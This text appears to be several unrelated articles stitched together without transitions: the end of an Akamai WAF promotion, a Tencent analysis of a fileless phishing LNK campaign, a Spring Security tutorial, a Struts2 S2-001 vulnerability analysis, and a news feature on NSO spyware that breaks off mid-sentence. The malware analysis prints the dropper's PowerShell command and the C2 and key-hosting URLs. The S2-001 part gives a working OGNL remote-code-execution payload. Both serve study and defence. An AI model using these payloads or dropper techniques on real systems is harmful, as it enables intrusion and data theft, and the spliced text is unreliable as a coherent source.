I completely agree that API security is growing in importance. In a series of blog posts titled “The Dark Side of APIs” (1, 2 and 3), Akamai researchers raised concerns about how little many organizations know about the traffic hitting the interfaces used for computer-to-computer interaction. Considering that API traffic now constitutes more than 25% of all web traffic Akamai sees, we believe this is something organizations should also be concerned with.

Akamai was already leading the industry when it introduced a positive security model two years ago. In October, we took API security to the next level with automated protection, which makes it easier for organizations to scale their security posture. Not covered in this report is our API gateway, which gives our customers the ability to add API governance to their security footprint. Our all-around API solution now gives our customers improved API performance, security, and governance.

In summary, we are very proud that Akamai’s solutions received another outstanding recognition from Gartner after the 2018 Magic Quadrant for Web Application Firewalls, which shows the steady progress of our 100% cloud-based WAF and edge security solution.

So, if you are looking for a security solution to protect your web applications and APIs against DDoS, web or bot attacks, give us a call or click to chat with us. Or just take a test drive on a free trial .

Looking forward to hearing from you.

Stay safe!

The graphics were published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Akamai.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact.

Targeted attacks against UK and Swiss finance and trade companies using phishing LNK files

1. Overview

Recently, while triaging malicious files, the Tencent YuJian Threat Intelligence Center discovered several suspicious phishing LNK files (attack programs disguised as shortcut files). Analysis showed that these LNK files are cleverly constructed, drop no PE file at any stage (a fileless attack), and store their decryption keys and C2 addresses on social sites such as Twitter and YouTube.

Judging from the related samples, the attacks target European countries such as the UK and Switzerland, and the victims are foreign-trade and finance companies. The attacker's identity is still unknown; we hope the security community can help complete the picture.

Notable traits of this APT group's tradecraft:

1. The decoy is an LNK file disguised as a PDF document inside an archive (an LNK is a shortcut by default; once the malicious program runs, it opens a convincing decoy PDF, which makes the combination highly deceptive);

2. No PE file touches disk during the entire attack, neatly sidestepping conventional antivirus detection;

3. The attack program checks whether network-sniffing tools are installed (Wireshark and Nmap, typically used by security researchers for packet capture); if they are, the trojan's core functionality is not executed;

4. C2 addresses are updated, and decryption code is hosted, in public spaces on YouTube, Twitter, Google, and wordpress.com;

5. It collects the computer name, antivirus information, system install time, OS version, and other intelligence, and periodically uploads screenshots;

6. It detects virtual machines and other special software.

2. Technical analysis

1. The decoy

The decoy for this attack is a zip archive named Dubai_Lawyers_update_2018.zip containing two LNK files. The LNK files are carefully crafted by the attacker; opening one triggers the embedded malicious code. The two LNK files in the archive are similar, so we analyze one of them in detail.

2. LNK analysis

After the LNK runs, it executes the following malicious code:

Cmd.exe "/c powershell -c "$m='A_Dhabi.pdf.lnk';$t=[environment]::getenvironmentvariable('tmp');cp$m $t\$m;$z=$t+'\'+@(gci -name $t $m -rec)[0];$a=gc $z|out-string;$q=$a[($a.length-2340)..$a.length];[io.file]::WriteAllbytes($t+'\.vbe',$q);CsCrIpT$t'\.vbe'"

The command's main functions are:

1) Copy the dubai.pdf.lnk file to the %temp% directory;

2) Write the last 2340 bytes of the LNK file into "%temp%\.vbe";

3) Run the VBE with cscript.exe.

The dropped .vbe file is a script encoded with Microsoft's Script Encoder.

3. VBE script analysis

Decoded, the script first writes 136,848 bytes, starting at offset 2334 from the beginning of the LNK file, to "A_Dhabi.pdf" in the temp directory; this really is a PDF file. It then opens the PDF, so the victim believes they have merely opened a normal document.

Next, the script writes the 338,459 bytes that follow the PDF inside the LNK file to "%temp%\~.tmpF292.ps1", a PowerShell script. Finally, it records the next read position in "%temp%\~.tmpF293" and launches "~.tmpF292.ps1" with PowerShell.
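To make the carving concrete, here is a small re-implementation of the dropper's extraction step, written by us for illustration (it is not the attacker's code); the offset and length come from the analysis above:

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;

// Illustrative re-implementation of the carving step:
// copy a byte range out of the .lnk container into a standalone file.
public class LnkCarver {

    static void carve(Path lnk, Path out, int offset, int length) throws IOException {
        byte[] all = Files.readAllBytes(lnk);
        Files.write(out, Arrays.copyOfRange(all, offset, offset + length));
    }

    public static void main(String[] args) throws IOException {
        // The decoy PDF sits at offset 2334 and is 136,848 bytes long.
        carve(Path.of("A_Dhabi.pdf.lnk"), Path.of("A_Dhabi.pdf"), 2334, 136_848);
    }
}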
4. Analysis of ~.tmpF292.ps1

The original .ps1 script is itself encrypted. After decryption, two striking plaintext strings appear: "Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industrys standard dummy text ever since the 1500s" and "when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries but also the leap into electronic typesetting remaining essentially unchanged."

These two strings play no part in the decryption logic and are essentially meaningless; a web search shows they are standard typesetting filler text.

Once the encrypted code is decrypted, the logic becomes quite clear. The $code = @"..."@ section is C# invoked from within PowerShell; the rest is PowerShell script. The script's main functions are:

1) Use WMI to detect security software, including AVG and Avast; if found, delete the intermediate files and exit;

2) Check whether Wireshark or Nmap is present; if so, skip the trojan's core functionality;

3) Read the file offset from the "~.tmpF293" file, read data from the LNK at that offset, and store it under "%temp%\~.tmpF291"; the files involved are ~.tmpF222.tmp, ~.tmpF295.ico, and ~.tmpF299.vbe;

4) Read the second-stage payload from the LNK, then decrypt and execute it using a key fetched from the internet. If the network is unreachable and no key is obtained, store the still-encrypted second-stage payload in "%temp%\~.tmp.e";

5) If "%temp%\~.tmp.e" exists, decrypt it with the key fetched from the network to obtain the second-stage payload "~.tmpF294.ps1", then execute it;

6) Store the URLs used to obtain the decryption key in the tmpF222.tmp file. The URLs retrieved are:

https://youtu.be/40rHiF75z5o

https://brady4th.wordpress.com/2018/11/15/opener/

https://twitter.com/Fancy65716779

https://plus.google.com/u/0/collection/U84ZPF

The script then extracts the decryption material from these pages: the string beginning at the marker "Yobro i sing" is the C2 for the stage-2 payload, and the string beginning at "My keyboard doesnt work" is the decryption key.

Judging from the publication dates of those posts, we infer the actual attack began on November 15 and November 18.

7) Persistence: a shortcut is created in the Startup directory that uses cscript.exe to run the "~.tmpF299.vbe" file from the "~.tmpF291" directory; the shortcut's icon is "~.tmpF295.ico".
5. Stage 2 (~.tmpF294.ps1) analysis

~.tmpF294.ps1 is the stage-2 script. It is likewise encrypted; after decryption, the real C2 communication and related functionality become visible.

1) Use WMI commands to collect machine information and send it to the C2 in JSON format. The collected data includes the computer name, machine name, antivirus information, system install time, and OS version; the format also contains markers such as "ace", "dama", "king", and "joker".

2) Detect virtual machines and other special software.

3) Detect whether specific tools such as Wireshark, WinPcap, and Nmap are installed.

4) Update the C2 from sites such as Twitter, YouTube, Google, and WordPress.

5) Take screenshots on a timer and upload them.

6) Execute PowerShell scripts issued by the C2.

7) Hide the "%temp%\~.tmpF291" directory. Special storage paths: "AA36ED3F6A22" stores IP addresses, "E4DAFF315DFA" stores domains, and "~.tmpF297.tmp" stores the serial number issued by the C2.

8) Adjust the quality and frequency of the timed screenshots as directed by the server.

3. Correlation analysis

1. Related samples

Pivoting on the C2, we found several more samples of the same kind:

Confirm.pdf.lnk, d83f933b2a6c307e17438749eda29f02
Gift-18.pdf.lnk, 6f965640bc609f9c5b7fea181a2a83ca

These two LNK files likewise came from a single zip archive, Gift-18.zip. Analysis shows they belong to the same attack. The archive also contained an image.

How to get the current user in a Spring Security reactive (WebFlux) and non-reactive (Spring MVC) application


When developing an application, we sometimes need to access the currently logged in user programmatically. In this post, we’ll discuss how to do that when using Spring Security ― both in non-reactive (Spring MVC) as well as reactive (Spring WebFlux) applications.

The code snippets are derived from the Spring Lemon library. If you haven’t heard of Spring Lemon , it’s a library encapsulating the sophisticated non-functional code and configuration that’s needed when developing reactive and non-reactive real-world RESTful web services using the Spring framework and Spring Boot.

When someone logs in, Spring Security creates an Authentication object. The authentication object has a principal property, which stores the current user.

So, if you can access the Authentication object, you can get the current user, like this:

public static Optional<User> currentUser(Authentication auth) { if (auth != null) { Object principal = auth.getPrincipal(); if (principal instanceof User) // User is your user type that implements UserDetails return Optional.of((User) principal); } return Optional.empty(); }

But, how to get access to the Authentication object?

The authentication object is stored in the SecurityContext object. Given the SecurityContext, a reference to the authentication object can be obtained just as below:

Authentication auth = securityContext.getAuthentication();

How to get access to the SecurityContext becomes the question then. It's different for reactive and non-reactive applications.

Accessing SecurityContext in a non-reactive (Spring MVC) application

Traditional (non-reactive) Spring Security provides a static method to access the security context, which can be called from anywhere, as below:

SecurityContext context = SecurityContextHolder.getContext();
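Putting the pieces together for the non-reactive case, a small helper along these lines (a sketch; the User type is the UserDetails implementation from the earlier snippet, and the class name here is ours) returns the current user from anywhere on the request thread:

import java.util.Optional;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.context.SecurityContextHolder;

// Sketch: resolve the current user from the thread-bound SecurityContext.
// "User" is assumed to be your UserDetails implementation, as above.
public final class CurrentUserUtils {

    private CurrentUserUtils() {}

    public static Optional<User> currentUser() {
        Authentication auth = SecurityContextHolder.getContext().getAuthentication();
        if (auth != null && auth.getPrincipal() instanceof User) {
            return Optional.of((User) auth.getPrincipal());
        }
        return Optional.empty();
    }
}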

Accessing SecurityContext in a reactive (Spring WebFlux) application

Reactive Spring Security provides that in a reactive manner, as below:

Mono<SecurityContext> context = ReactiveSecurityContextHolder.getContext();

Beware that the Mono<SecurityContext> returned above is just the assembly, which gets resolved later at subscription time. Here is an example usage:

@PostMapping("/current-user") public Mono<UserDto<ID>> getCurrentUser(ServerWebExchange exchange) { return ReactiveSecurityContextHolder.getContext() .map(SecurityContext::getAuthentication) .map(Authentication::getPrincipal) .map(MyPrincipal::currentUser) .zipWith(exchange.getFormData()) .doOnNext(tuple -> { // based on some input parameters, amend the current user data to be returned }) .map(Tuple2::getT1); }

For exact details, refer to LecUtils, LemonUtils and LerUtils of Spring Lemon.

S2-001: A Detailed Vulnerability Analysis

0x00 Preface

Reading this article assumes that you:

are familiar with J2EE development, mainly JSP development; understand the Struts2 request-processing flow; understand OGNL expressions.

If you lack this background, this article will be a difficult journey.

0x01 Reproducing the vulnerability

Affected versions:

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

Vulnerable test application (the analysis below uses this code; download it and follow along locally):

https://github.com/dean2021/java_security_book/tree/master/Struts2/s2_001

The published PoC:

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"id"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

The simplified PoC:

%{1+1}

We will use this minimal PoC. With the test application running locally, we send the following request:

POST /login.action HTTP/1.1
Host: localhost:8080
Content-Length: 19
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/login.action
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,pt;q=0.7,da;q=0.6
Cookie: JSESSIONID=1478B902172E01647C8DDD6E62390FD1
Connection: close

// password=%{1+1}
password=%25%7B1%2B1%7D

The content of the HTTP response:

HTTP/1.1 200
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 18 Dec 2018 09:21:30 GMT
Connection: close
Content-Length: 1222

// ... omitted
<form id="login" name="login" onsubmit="return true;" action="/login.action" method="post">
<table class="wwFormTable">
<tr> <td class="tdLabel"> <label for="login_password" class="label">password:</label></td> <td> <input type="text" name="password" value="2" id="login_password" /></td> </tr>
<tr> <td colspan="2"> <div align="right"> <input type="submit" id="login_0" value="Submit" /></div> </td> </tr>
</table>
</form>

Note that the input's value attribute is 2, which proves our OGNL expression %{1+1} was executed. Now let's dig into the details.

0x02 Vulnerability analysis

From the official security bulletin, we know roughly that the problem lies in the textfield custom tag. Here is part of our index.jsp:

<%@taglib prefix="s" uri="/struts-tags" %> <s:form action="login"> <s:textfield label="password" name="password"/> <s:submit/> </s:form>

As the code shows, Struts2 uses a custom tag library, /struts-tags. Reading the struts2-core-2.0.8.jar!/META-INF/struts-tags.tld file, we learn that the textfield tag is implemented by org.apache.struts2.views.jsp.ui.TextFieldTag:

public class TextFieldTag extends AbstractUITag { private static final long serialVersionUID = 5811285953670562288L; protected String maxlength; protected String readonly; protected String size; public TextFieldTag() { } public Component getBean(ValueStack stack, HttpServletRequest req, HttpServletResponse res) { return new TextField(stack, req, res); } protected void populateParams() { super.populateParams(); TextField textField = (TextField)this.component; textField.setMaxlength(this.maxlength); textField.setReadonly(this.readonly); textField.setSize(this.size); } /** @deprecated */ public void setMaxLength(String maxlength) { this.maxlength = maxlength; } public void setMaxlength(String maxlength) { this.maxlength = maxlength; } public void setReadonly(String readonly) { this.readonly = readonly; } public void setSize(String size) { this.size = size; } }

Readers familiar with JSP custom tags will know to look for the doStartTag method, since tag processing starts there (see [2]). We find doStartTag in TextFieldTag's parent class, ComponentTagSupport:

public abstract class ComponentTagSupport extends StrutsBodyTagSupport { protected Component component; public ComponentTagSupport() { } public abstract Component getBean(ValueStack var1, HttpServletRequest var2, HttpServletResponse var3); public int doEndTag() throws JspException { this.component.end(this.pageContext.getOut(), this.getBody()); this.component = null; return 6; } public int doStartTag() throws JspException { this.component = this.getBean(this.getStack(), (HttpServletRequest)this.pageContext.getRequest(), (HttpServletResponse)this.pageContext.getResponse()); Container container = Dispatcher.getInstance().getContainer(); container.inject(this.component); this.populateParams(); boolean evalBody = this.component.start(this.pageContext.getOut()); if (evalBody) { return this.component.usesBody() ? 2 : 1; } else { return 0; } } protected void populateParams() { this.component.setId(this.id); } public Component getComponent() { return this.component; } }

Analyzing doStartTag shows that it merely initializes some of the tag's attributes; it is not the cause of the vulnerability. So we continue: when the tag ends, doEndTag is called. Following it:

public int doEndTag() throws JspException { this.component.end(this.pageContext.getOut(), this.getBody()); this.component = null; return 6; }

The end method here is defined in the UIBean class. Following its implementation:

public abstract class UIBean extends Component {
    public boolean end(Writer writer, String body) {
        // Follow this method's implementation
        this.evaluateParams();
        try {
            super.end(writer, body, false);
            this.mergeTemplate(writer, this.buildTemplateName(this.template, this.getDefaultTemplate()));
        } catch (Exception var7) {
            LOG.error("error when rendering", var7);
        } finally {
            this.popComponentStack();
        }
        return false;
    }

Following the implementation of this.evaluateParams:

public void evaluateParams() {
    // ... n lines omitted
    if (...) {
        // This "password" string comes from parsing the textfield's name
        // attribute; pseudocode stands in for the real code here.
        String name = "password"
        // struts.tag.altSyntax controls whether OGNL expression syntax
        // is allowed inside Struts2 tags.
        if (this.altSyntax()) {
            // Wrap the textfield tag's name attribute, i.e. expr = "%{password}"
            expr = "%{" + name + "}";
        }
        // UIBean.java line 306; follow this.findValue
        this.addParameter("nameValue", this.findValue(expr, valueClazz));
    }
    // ... n lines omitted

Following the implementation of this.findValue(expr, valueClazz):

public class Component {
    // expr = "%{password}"
    protected Object findValue(String expr, Class toType) {
        if (this.altSyntax() && toType == String.class) {
            // Follow this method
            return TextParseUtil.translateVariables('%', expr, this.stack);
        } else {
            if (this.altSyntax() && expr.startsWith("%{") && expr.endsWith("}")) {
                expr = expr.substring(2, expr.length() - 1);
            }
            return this.getStack().findValue(expr, toType);
        }
    }

Following the implementation of TextParseUtil.translateVariables('%', expr, this.stack):

public class TextParseUtil {
    public static String translateVariables(char open, String expression, ValueStack stack) {
        return translateVariables(open, expression, stack, String.class, null).toString();
    }

    public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;
        // Loop repeatedly
        while (true) {
            // expression = %{password}
            // This block strips the %{ and }, keeping "password"
            int start = expression.indexOf(open + "{");
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;
            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);
                // On the first iteration var is "password", and evaluating it
                // returns %{1+1}; on the second iteration var is "1+1", and our
                // malicious OGNL expression executes.
                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                    o = evaluator.evaluate(o);
                }
                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                if (o != null) {
                    if (TextUtils.stringSet(left)) {
                        result = left + o;
                    } else {
                        result = o;
                    }
                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }
                    expression = left + o + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
            } else {
                break;
            }
        }
        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

As the comments indicate, OgnlValueStack.findValue() ultimately evaluates our OGNL expression 1+1. Readers unfamiliar with OgnlValueStack can refer to [3].

That completes the analysis: the vulnerability is caused by a recursive loop that ends up evaluating a request parameter's value as an OGNL expression.
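The double evaluation can be reproduced outside Struts2 with the OGNL library alone. A minimal sketch (the class and variable names are ours, assuming an OGNL 2.x/3.x-style API on the classpath):

import java.util.HashMap;
import java.util.Map;
import ognl.Ognl;

// Sketch of the S2-001 double evaluation:
// pass 1 resolves "password" to the attacker-supplied "%{1+1}",
// pass 2 evaluates the inner expression, yielding 2.
public class DoubleEvalDemo {
    public static void main(String[] args) throws Exception {
        Map<String, Object> root = new HashMap<>();
        root.put("password", "%{1+1}"); // attacker-controlled parameter

        Map context = Ognl.createDefaultContext(root);

        // Pass 1: what findValue("%{password}") effectively does.
        String firstPass = (String) Ognl.getValue("password", context, root);

        // Pass 2: translateVariables loops, strips %{...}, and evaluates again.
        String inner = firstPass.substring(2, firstPass.length() - 1);
        Object result = Ognl.getValue(inner, context, root);

        System.out.println(result); // prints 2
    }
}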

0x03 Vulnerability details

1. Why does evaluating the %{password} expression return our request parameter value %{1+1}?

The parameter value is set in ParametersInterceptor.java. Anyone familiar with the Struts2 framework will recognize interceptors; here is the implementation of the parameters interceptor:

public class ParametersInterceptor extends MethodFilterInterceptor {
    public String doIntercept(ActionInvocation invocation) throws Exception {
        // Get the action for the current request, i.e. LoginAction
        Object action = invocation.getAction();
        if (!(action instanceof NoParameters)) {
            ActionContext ac = invocation.getInvocationContext();
            // Get the current request's parameters, i.e. password = %{1+1}
            final Map parameters = ac.getParameters();
            // ... n lines omitted
            if (parameters != null) {
                Map contextMap = ac.getContextMap();
                try {
                    // ... n lines omitted
                    ValueStack stack = ac.getValueStack();
                    // Push the parameters onto the stack; follow the implementation...
                    setParameters(action, stack, parameters);
                } finally {
                    // ...
                }
            }
        }
        return invocation.invoke();
    }

    protected void setParameters(Object action, ValueStack stack, final Map parameters) {
        ParameterNameAware parameterNameAware = (action instanceof ParameterNameAware) ? (ParameterNameAware) action : null;
        Map params = null;
        if (ordered) {
            params = new TreeMap(getOrderedComparator());
            params.putAll(parameters);
        } else {
            params = new TreeMap(parameters);
        }
        for (Iterator iterator = params.entrySet().iterator(); iterator.hasNext();) {
            Map.Entry entry = (Map.Entry) iterator.next();
            String name = entry.getKey().toString();
            // ... n lines omitted
            if (acceptableName) {
                // Here we obtain %{1+1}, i.e. our malicious OGNL expression
                Object value = entry.getValue();
                try {
                    // Store the parameter in the OGNL stack:
                    // password = %{1+1}
                    stack.setValue(name, value);
                } catch (RuntimeException e) {
                    // ...
                }
            }
        }
    }
}

When a request is processed, this interceptor stores each parameter name and value in the stack; that is why evaluating %{password} can retrieve our %{1+1}. Triggering the vulnerability therefore requires all of the following:

struts.tag.altSyntax is set to true, which is the default. The request parameter is attacker-controlled, and the target action parses it, i.e. it defines the corresponding field and setter (such as private String password;); otherwise the ParametersInterceptor never captures the parameter. The JSP page the request renders contains a textfield tag whose name attribute matches the parameter's key.

2. Why do writeups keep saying Struts2 Validation (form validation) triggers the bug?

Looking at the required flow above: when Validation is configured in a Struts2 application and form validation fails, the framework necessarily returns to the form page. That is exactly step 3: the submission page contains a textfield tag, so the bug fires. (Login and registration forms are a typical scenario.)

0x04 Summary

With struts.tag.altSyntax enabled, the Struts2 framework evaluates request parameter values as OGNL expressions, leading to arbitrary code execution.

0x05 Patch analysis

The official advice is to upgrade Struts to 2.0.9 or XWork to 2.0.4. Our analysis above already showed that the problem lives in the XWork framework, so upgrading XWork is sufficient.

Let's look at the fix:

Struts2 2.0.8 source download; Struts2 2.0.9 source download

From the pom.xml in the Struts 2.0.9 source, we can see the bundled xwork dependency was bumped to 2.0.4, which fixes the vulnerability:

<dependency> <groupId>com.opensymphony</groupId> <artifactId>xwork</artifactId> <version>2.0.4</version> </dependency>

Let's see how xwork 2.0.4 fixes the vulnerability.

XWork 2.0.3 source download

XWork 2.0.4 source download

TIP: extract a jar file with: jar xvf xxx.jar

As our analysis showed, the OGNL expression is evaluated in the translateVariables method of TextParseUtil. Comparing the code, we find that 2.0.4 modifies TextParseUtil.java. Here is the 2.0.4 version:

public class TextParseUtil {
    private static final int MAX_RECURSION = 1;

    public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // A MAX_RECURSION constant has been added
        return translateVariables(open, expression, stack, asType, evaluator, MAX_RECURSION);
    }

    /**
     * Converted object from variable translation.
     *
     * @param open
     * @param expression
     * @param stack
     * @param asType
     * @param evaluator
     * @return Converted object from variable translation.
     */
    public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;
        int loopCount = 1;
        int pos = 0;
        while (true) {
            // At this point expression = %{name}
            int start = expression.indexOf(open + "{", pos);
            if (start == -1) {
                pos = 0;
                loopCount++;
                start = expression.indexOf(open + "{");
            }
            // This added check is the key: maxLoopCount is 1, so on the second
            // iteration loopCount is 2 and we break out of the loop, preventing
            // the malicious OGNL from being evaluated. The original comment
            // below says as much.
            if (loopCount > maxLoopCount) {
                // translateVariables prevent infinite loop / expression recursive evaluation
                break;
            }
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;
            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);
                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                    o = evaluator.evaluate(o);
                }
                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                String middle = null;
                if (o != null) {
                    middle = o.toString();
                    if (!TextUtils.stringSet(left)) {
                        result = o;
                    } else {
                        result = left + middle;
                    }
                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }
                    expression = left + middle + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
                pos = (left != null && left.length() > 0 ? left.length() - 1 : 0) +
                      (middle != null && middle.length() > 0 ? middle.length() - 1 : 0) + 1;
                pos = Math.max(pos, 1);
            } else {
                break;
            }
        }
        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

Reading the code, the official fix adds a MAX_RECURSION = 1 constant and checks the loop count against it, which prevents the recursive loop from evaluating the injected OGNL expression.

0x06 References

What kind of vulnerability can cost you your life?


Some time ago, this Leifeng.com Zhaike channel (WeChat ID: letshome) editor wrote "What kind of vulnerability can buy you an apartment inside Beijing's Second Ring Road?", which laid out several paths to getting rich from bugs. Revisiting the question recently raised a new one: what kind of vulnerability can cost you your life?

A news story quickly answered it.

Author: Li Qin, network security columnist at Leifeng.com, WeChat: qinqin0511

The butterfly effect of unleashing "Pegasus"

On October 2, Saudi journalist Jamal Khashoggi walked into the Saudi consulate in Istanbul, Turkey, to handle paperwork for his marriage, and never walked out. It was an unusually gruesome death; lurid descriptions such as "dismembered alive" and "his hands cut off and carried back as proof" circulated widely.

CNN reported in December that before his death, Khashoggi and a friend, Omar Abdulaziz, had been planning a youth "cyber army" initiative called the "cyber bees" over a social app, documenting Saudi human-rights abuses through videos and a website; they also discussed shipping SIM cards from abroad back to Saudi Arabia and how to fund the "cyber army".

Unexpectedly, the Saudi government learned of these discussions.

After his friend's death, a grieving Abdulaziz came to suspect that the surveillance of his phone had been the trigger for the tragedy. He sent the phone to Citizen Lab at the University of Toronto for examination, and researchers told him it had been compromised by military-grade spyware.

The researchers said the software was built by an Israeli company called NSO Group and deployed at the request of the Saudi government.

Naturally, NSO denied everything, in three parts:

1. You have no evidence that our technology was used to break into Abdulaziz's phone.

2. Our technology helps governments and law-enforcement agencies fight terrorism and crime, and is fully reviewed and approved by the Israeli government (subtext: how would we know what they use it for; we only sell it).

3. NSO's products are operated by government customers; NSO personnel are not involved.

Denials aside, who doesn't know NSO's record?

Two years ago, "Trident", a chain of three high-severity 0-days, shocked iPhone users. Many assumed the iPhone was absolutely secure until Trident punctured the illusion: with it, an attacker only needed to send a malicious link and trick the user into tapping it for the phone to be fully taken over, stealing SMS, email, call logs, call recordings, stored passwords and other private data, monitoring and stealing chat messages from social apps, even silently switching on the microphone to record and exfiltrate audio, all without the user noticing.

The "Pegasus" spyware that exploited Trident was NSO's work. At the time, it emerged that the Saudi government had bought Pegasus and used it against a well-known human-rights activist.

This case follows the same playbook, possibly even the same Pegasus. I checked with MJ0011, the top hacker who led a 360 team to the "Master of Pwn" title: with this kind of spyware, sending a single message to a victim's iPhone is enough to take control, with no click on a link required. In the case of the murdered Saudi journalist, the once-0-day had circulated and become an N-day; the flaw had long been patched, but any phone not upgraded to the latest version would still fall victim.

Cyber weapons and cyber war

The butterfly flapped its wings, a storm followed, and Khashoggi, who had been communicating with Abdulaziz, lost his life.

If "a vulnerability that can take a life" already makes you shudder, pull back the curtain one more layer: Khashoggi's death, seemingly only "incidentally" linked to a vulnerability, may be just a glimpse of vulnerabilities being weaponized into cyber arms and of state-level cyber warfare.

Talking with MJ reinforced that view.

First, NSO's background.

Omri Lavie and Shalev Hulio founded NSO. From July 2005 to October 2007, Lavie was an Israeli government "employee". Hulio served as a company-level commander in the Israel Defense Forces (search and rescue) from August 1999 to November 2004, and some NSO staff previously worked in Unit 8200, the IDF unit responsible for signals intelligence and code-breaking.

The New York Times has reported NSO's price list: $650,000 charged to government agencies for monitoring 10 iPhone or Android users; $500,000 for 5 BlackBerry users; $300,000 for 5 Symbian users, installation fees extra. Monitoring more targets costs more: an additional $800,000 for 100 targets, $500,000 for 50, $250,000 for 20, $150,000 for 10. Annual system maintenance runs 17% of the cumulative price thereafter.

Think of NSO as a supplier selling cyber weapons to governments and similar agencies, though in the vast cyber-arms supply chain such suppliers may only play bit parts.

MJ told me that countries with strong native cyber capability, such as the United States, Russia, and the UK, have their own "security organizations"; the US has the NSA, for instance. For security and secrecy, they generally develop cyber arms in-house. "Some small countries can't build their own, so they have to buy from arms dealers."

Ukraine and Russia are a live example. Recently, a state-level campaign exploiting an Adobe Flash 0-day came to light. The 360 security team found the samples most likely originated in Ukraine, with the targets pointing to a medical institution under the Administrative Directorate of the President of the Russian Federation.

Interestingly, the cyber weapon Ukraine used this time appears to have been bought from Hacking Team, a company similar to NSO that has drawn controversy for developing and selling surveillance software with government backing. In 2016, Hacking Team was itself hacked and its secrets exposed: it routinely sold cyber weapons to countries without strong in-house capability, such as Middle Eastern states, small European countries, and South Korea.

Where cyber-military strength is lopsided, the weaker side uses such suppliers to balance the battlefield, and vulnerabilities and the weapons derived from them take on an unmistakably political color.

Especially if you note that on November 25, the Kerch Strait incident erupted between Ukraine and Russia, with Ukrainian navy vessels clashing violently with the Russian navy while sailing toward the strait. "Before this Russia-Ukraine crisis, Ukraine was already preparing this weapon, and within days they launched the attack. APT campaigns have always tracked real political and military events," MJ noted.

Khashoggi's death also sits inside a whirlpool of political contest.

Cankao Xiaoxi reported on the 10th that an anonymous US intelligence official said Israeli authorities had approved the sale of phone-hacking spyware to Saudi intelligence so that it could break into the phones of government critics. Israel did so to build a firmer alliance with Saudi Arabia, the largest Arab state, in its struggle with Iran.

I had naively treated "what kind of vulnerability can cost you your life" as a question. Against this backdrop, it was never really a question, only an outcome that was "probably bound to happen".

Khashoggi's death dragged the connection into the open. APTs, vulnerabilities, and cyber war, once the preserve of specialists, are now felt by ordinary people: Hillary Clinton's leaked emails; the rampant WannaCry ransomware outbreak; and Ukraine's power grid twice attacked by hackers, leaving millions without heat, shivering through winter and experiencing first-hand how terrifying cyber war can be.

The contest

If you follow international "Pwn" vulnerability contests, you will have noticed fewer and fewer Chinese entrants over the past two years; those teams have shifted their Pwn battlegrounds, and appreciation of the power of vulnerabilities has reached unprecedented heights.

If vulnerabilities and the cyber weapons they enable are so powerful, why is there no rule to balance the various forces between nations?

There is one, in fact.

In December 2013, amendments to the annexes of the Wassenaar Arrangement on Export Controls for Conventional Arms and Dual-Use Goods and Technologies added certain intrusion software to its dual-use list. On May 20, 2015, the Bureau of Industry and Security (BIS) under the US Department of Commerce proposed implementing rules ("Wassenaar Arrangement 2013 Plenary Agreements Implementation: Intrusion and Surveillance Items"), defining intrusion items to include "network penetration testing products that use intrusion software to identify vulnerabilities of computers and network-capable devices," and proposing to bring intrusion software under the US Export Administration Regulations (EAR).

Even so, MJ considers the Wassenaar Arrangement merely a "game" among member states:

